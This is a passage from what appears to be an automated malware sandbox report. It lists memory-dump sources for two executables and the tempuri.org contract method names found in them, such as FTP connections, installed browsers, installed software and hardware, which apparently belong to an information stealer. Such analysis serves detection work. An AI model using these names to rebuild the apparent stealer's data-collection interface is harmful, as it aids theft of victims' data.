                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionFtpConnectionsResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionFtpConnectionsResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionHardwares
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionHardwaresLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionHardwaresResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionHardwaresResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledBrowsers
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledBrowsersLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledBrowsersResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledBrowsersResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledSoftwares
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledSoftwaresLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledSoftwaresResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionInstalledSoftwaresResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtensionLanguages
